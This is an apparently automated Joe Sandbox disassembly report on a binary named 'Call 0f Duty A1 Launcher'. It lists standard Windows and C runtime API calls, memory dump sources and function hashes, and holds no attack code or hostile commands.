                                                                                      APIs
                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,7967C5A5,?,?,00000000,003825EB,000000FF,?,00377015,00000002,?,003770B1,003783A0), ref: 00376F89
                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00376F9B
                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000,003825EB,000000FF,?,00377015,00000002,?,003770B1,003783A0), ref: 00376FBD
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2043249138.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042955657.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043293521.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043327875.000000000038B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043357423.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043387506.000000000038F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043437298.0000000000391000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_360000_Call 0f Duty A1 Launcher.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                      • API String ID: 4061214504-1276376045
                                                                                      • Opcode ID: b4d18dd409ab0aec30a9ef289c6438e7281e6414af7c2d65981ec58ac920fc42
                                                                                      • Instruction ID: 1b8123a8b087c6a2a37dff56b4ebd33f3a433bed552ff39b2b3025abd55c3e62
                                                                                      • Opcode Fuzzy Hash: b4d18dd409ab0aec30a9ef289c6438e7281e6414af7c2d65981ec58ac920fc42
                                                                                      • Instruction Fuzzy Hash: 1601A231904719ABCB139F51DC09FEEB7BCFB04B11F054569E811A2690DB749904CB90
                                                                                      APIs
                                                                                      • __alloca_probe_16.LIBCMT ref: 0037DFA2
                                                                                      • __alloca_probe_16.LIBCMT ref: 0037E06B
                                                                                      • __freea.LIBCMT ref: 0037E0D2
                                                                                        • Part of subcall function 0037BC45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,003741E0,?,?,00371007,?,0036FAB5), ref: 0037BC77
                                                                                      • __freea.LIBCMT ref: 0037E0E5
                                                                                      • __freea.LIBCMT ref: 0037E0F2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2043249138.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042955657.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043293521.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043327875.000000000038B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043357423.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043387506.000000000038F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043437298.0000000000391000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_360000_Call 0f Duty A1 Launcher.jbxd
                                                                                      Similarity
                                                                                      • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                      • String ID:
                                                                                      • API String ID: 1423051803-0
                                                                                      • Opcode ID: 7d3ffd5b718e76aeae7e08a8dc35fa95a71520ff37c0476946d197925259e572
                                                                                      • Instruction ID: 240f4bb34426472f7de0800aa6c4bffd72ca0e8b31df50864dc401c0da102695
                                                                                      • Opcode Fuzzy Hash: 7d3ffd5b718e76aeae7e08a8dc35fa95a71520ff37c0476946d197925259e572
                                                                                      • Instruction Fuzzy Hash: 6E519072600206AFDB336F62CC41EAB76A9EF48710B16C569FD0DDA151EB79DC50C660
                                                                                      APIs
                                                                                      • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,003793FE,?,?,00000000,00000000,00000000,?), ref: 0037951D
                                                                                      • CatchIt.LIBVCRUNTIME ref: 00379603
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2043249138.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042955657.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043293521.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043327875.000000000038B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043357423.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043387506.000000000038F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043437298.0000000000391000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_360000_Call 0f Duty A1 Launcher.jbxd
                                                                                      Similarity
                                                                                      • API ID: CatchEncodePointer
                                                                                      • String ID: MOC$RCC
                                                                                      • API String ID: 1435073870-2084237596
                                                                                      • Opcode ID: af50a4502d671c1cb6980f61c8dde6597246f5112f1ce933820d825e8cb85c69
                                                                                      • Instruction ID: dc9e869c1af0a6bc70f3bde383bea819d268e6de953033edc534a1af0874b102
                                                                                      • Opcode Fuzzy Hash: af50a4502d671c1cb6980f61c8dde6597246f5112f1ce933820d825e8cb85c69
                                                                                      • Instruction Fuzzy Hash: 32414771900219AFCF27CF98CC81AAE7BB5EF48310F19829AF909AA211D7399950DB51
                                                                                      APIs
                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,0037DCFA,00000000,?,0038CCD0,?,?,?,0037DC31,00000004,InitializeCriticalSectionEx,003846F8,00384700), ref: 0037DC6B
                                                                                      • GetLastError.KERNEL32(?,0037DCFA,00000000,?,0038CCD0,?,?,?,0037DC31,00000004,InitializeCriticalSectionEx,003846F8,00384700,00000000,?,0037971C), ref: 0037DC75
                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0037DC9D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2043249138.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042955657.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043293521.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043327875.000000000038B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043357423.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043387506.000000000038F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043437298.0000000000391000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_360000_Call 0f Duty A1 Launcher.jbxd
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                      • String ID: api-ms-
                                                                                      • API String ID: 3177248105-2084034818
                                                                                      • Opcode ID: 4cbfbcd9c0a9dc6270ddc6c1c2f2dc740b9b3c803abcf286e81ceb45b079cc49
                                                                                      • Instruction ID: b86512a4285446a45cf9d99314723746090db107e0ed68e69922c99cad5f5425
                                                                                      • Opcode Fuzzy Hash: 4cbfbcd9c0a9dc6270ddc6c1c2f2dc740b9b3c803abcf286e81ceb45b079cc49
                                                                                      • Instruction Fuzzy Hash: E5E04830240306BBEF232B52DC47B683B6DAF40B54F64C061F90DE90E1EBA69911C644
                                                                                      APIs
                                                                                      • GetConsoleOutputCP.KERNEL32(7967C5A5,00000000,00000000,?), ref: 0037E64B
                                                                                        • Part of subcall function 0037D131: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,000000FF,?,?,00000000,?,?,003787B1,?,00000000,?), ref: 0037D192
                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0037E89D
                                                                                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0037E8E3
                                                                                      • GetLastError.KERNEL32 ref: 0037E986
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2043249138.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042955657.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043293521.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043327875.000000000038B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043357423.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043387506.000000000038F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043437298.0000000000391000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_360000_Call 0f Duty A1 Launcher.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                      • String ID:
                                                                                      • API String ID: 2112829910-0
                                                                                      • Opcode ID: c9298222e0531d15f5d357525fa149b84063ce9c6084673167653f5b4751d45e
                                                                                      • Instruction ID: 25dfd311ab3e771f344f6ad1e17c0a03a8695d6f5834a203de8e2cae152a3b19
                                                                                      • Opcode Fuzzy Hash: c9298222e0531d15f5d357525fa149b84063ce9c6084673167653f5b4751d45e
                                                                                      • Instruction Fuzzy Hash: 59D18D75D002589FCF26CFA8C8909ADBBB9FF0D310F1885AAE559EB351D738A941CB50
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2043249138.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042955657.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043293521.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043327875.000000000038B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043357423.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043387506.000000000038F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043437298.0000000000391000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_360000_Call 0f Duty A1 Launcher.jbxd
                                                                                      Similarity
                                                                                      • API ID: AdjustPointer
                                                                                      • String ID:
                                                                                      • API String ID: 1740715915-0
                                                                                      • Opcode ID: a3712e09ec4dc0258cc513fbfacaeb98cfe00b66bc40689fd7571c0d4753d551
                                                                                      • Instruction ID: 4212ebafc41271067e03ee490aaaab91458c4e0ac185cb55c2daeebd5114adc8
                                                                                      • Opcode Fuzzy Hash: a3712e09ec4dc0258cc513fbfacaeb98cfe00b66bc40689fd7571c0d4753d551
                                                                                      • Instruction Fuzzy Hash: D651EF72611606AFEB3B8F14D845BBA73A5FF04310F15862EE90D9B691EB79EC40C790
                                                                                      APIs
                                                                                        • Part of subcall function 0037D131: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,000000FF,?,?,00000000,?,?,003787B1,?,00000000,?), ref: 0037D192
                                                                                      • GetLastError.KERNEL32(?,?,?,00000000,00000000,?,0037C95E,?,?,?,00000000), ref: 0037C61C
                                                                                      • __dosmaperr.LIBCMT ref: 0037C623
                                                                                      • GetLastError.KERNEL32(00000000,0037C95E,?,?,00000000,?,?,?,00000000,00000000,?,0037C95E,?,?,?,00000000), ref: 0037C65D
                                                                                      • __dosmaperr.LIBCMT ref: 0037C664
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2043249138.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042955657.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043293521.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043327875.000000000038B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043357423.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043387506.000000000038F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043437298.0000000000391000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_360000_Call 0f Duty A1 Launcher.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                      • String ID:
                                                                                      • API String ID: 1913693674-0
                                                                                      • Opcode ID: 145b97d3e3926c44a2860278b0cb1f1b04f54b0d623db495df18d6364935f23c
                                                                                      • Instruction ID: b826c13339065fe0aa280f1d11c7e7de035673abcbdc3330b8cb90a6e57b1c0e
                                                                                      • Opcode Fuzzy Hash: 145b97d3e3926c44a2860278b0cb1f1b04f54b0d623db495df18d6364935f23c
                                                                                      • Instruction Fuzzy Hash: 5B21B071210205AFDB32AF6688C0D2AB7ADEF45364715E81DF82D9B511D739ED008B90
                                                                                      APIs
                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 0037D235
                                                                                        • Part of subcall function 0037D131: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,000000FF,?,?,00000000,?,?,003787B1,?,00000000,?), ref: 0037D192
                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0037D26D
                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0037D28D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2043249138.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042955657.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043293521.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043327875.000000000038B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043357423.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043387506.000000000038F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043437298.0000000000391000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_360000_Call 0f Duty A1 Launcher.jbxd
                                                                                      Similarity
                                                                                      • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                      • String ID:
                                                                                      • API String ID: 158306478-0
                                                                                      • Opcode ID: 52d1fb20b538e391f118d96f45d005fa52cda04c87cf57560f6f663a8c6d7b6b
                                                                                      • Instruction ID: 35fe4e6cfee1cdf5357c32d8d596cdb075be79be70a4a584d00975b4394eac49
                                                                                      • Opcode Fuzzy Hash: 52d1fb20b538e391f118d96f45d005fa52cda04c87cf57560f6f663a8c6d7b6b
                                                                                      • Instruction Fuzzy Hash: 611126B15012097EA73327725C89DBF69BCCE883A4B158815F80ED6103FF28CD038670
                                                                                      APIs
                                                                                      • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,0037FF31,00000000,00000001,00000000,?,?,0037E9DA,?,00000000,00000000), ref: 003807D7
                                                                                      • GetLastError.KERNEL32(?,0037FF31,00000000,00000001,00000000,?,?,0037E9DA,?,00000000,00000000,?,?,?,0037E320,00000000), ref: 003807E3
                                                                                        • Part of subcall function 00380840: CloseHandle.KERNEL32(FFFFFFFE,003807F3,?,0037FF31,00000000,00000001,00000000,?,?,0037E9DA,?,00000000,00000000,?,?), ref: 00380850
                                                                                      • ___initconout.LIBCMT ref: 003807F3
                                                                                        • Part of subcall function 00380815: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,003807B1,0037FF1E,?,?,0037E9DA,?,00000000,00000000,?), ref: 00380828
                                                                                      • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,0037FF31,00000000,00000001,00000000,?,?,0037E9DA,?,00000000,00000000,?), ref: 00380808
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2043249138.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042955657.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043293521.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043327875.000000000038B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043357423.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043387506.000000000038F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043437298.0000000000391000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_360000_Call 0f Duty A1 Launcher.jbxd
                                                                                      Similarity
                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                      • String ID:
                                                                                      • API String ID: 2744216297-0
                                                                                      • Opcode ID: b69aa7fd6153648bfb77359f7debe8e0fb9593270998eb0ca633afdd349ca758
                                                                                      • Instruction ID: 9f96fc3976de4cd10ef05c4369d09b27aaef38ff57635c9a2d694fabed20f503
                                                                                      • Opcode Fuzzy Hash: b69aa7fd6153648bfb77359f7debe8e0fb9593270998eb0ca633afdd349ca758
                                                                                      • Instruction Fuzzy Hash: FCF01C36000219BFCF636F91EC08A9A7F2AFF083A1F0584A1FA0886131C67289649BD0
                                                                                      APIs
                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00378D75
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2043249138.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042955657.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043293521.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043327875.000000000038B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043357423.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043387506.000000000038F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043437298.0000000000391000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_360000_Call 0f Duty A1 Launcher.jbxd
                                                                                      Similarity
                                                                                      • API ID: ___except_validate_context_record
                                                                                      • String ID: csm$csm
                                                                                      • API String ID: 3493665558-3733052814
                                                                                      • Opcode ID: 0295f91ae6748ea3fc102bc101d2c0db44bc9827cbfca382291e5a9250aa7bb3
                                                                                      • Instruction ID: 5f082cf4b34713640ed7f068ed7cef11fdb5a4a49ec71a48e7e215e12b74a8c9
                                                                                      • Opcode Fuzzy Hash: 0295f91ae6748ea3fc102bc101d2c0db44bc9827cbfca382291e5a9250aa7bb3
                                                                                      • Instruction Fuzzy Hash: 7D31F176590219EFCF338F50CC089AA7B26FF08324B19C65AF84C59121CB3ADDA1DB81
                                                                                      APIs
                                                                                        • Part of subcall function 00374533: __EH_prolog3_GS.LIBCMT ref: 0037453A
                                                                                      • std::domain_error::domain_error.LIBCPMT ref: 003745EC
                                                                                        • Part of subcall function 003743A4: std::exception::exception.LIBCONCRT ref: 003743BA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2043249138.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042955657.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043293521.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043327875.000000000038B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043357423.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043387506.000000000038F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043437298.0000000000391000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_360000_Call 0f Duty A1 Launcher.jbxd
                                                                                      Similarity
                                                                                      • API ID: H_prolog3_std::domain_error::domain_errorstd::exception::exception
                                                                                      • String ID: CD7$CD7
                                                                                      • API String ID: 2144476180-526113481
                                                                                      • Opcode ID: efcef8c7cdc1b56e29d63a6a940fbb5659e1a726c4969dc85891e67289920f40
                                                                                      • Instruction ID: 3b20cf7b41cefb348cc2007047e1f3e252a586d4ddb6b779e92cc460870ce83f
                                                                                      • Opcode Fuzzy Hash: efcef8c7cdc1b56e29d63a6a940fbb5659e1a726c4969dc85891e67289920f40
                                                                                      • Instruction Fuzzy Hash: EA014C74E003189BCF19EF69D8458AEBBF8EF48704B10841EE4199B341DB34EA15CB94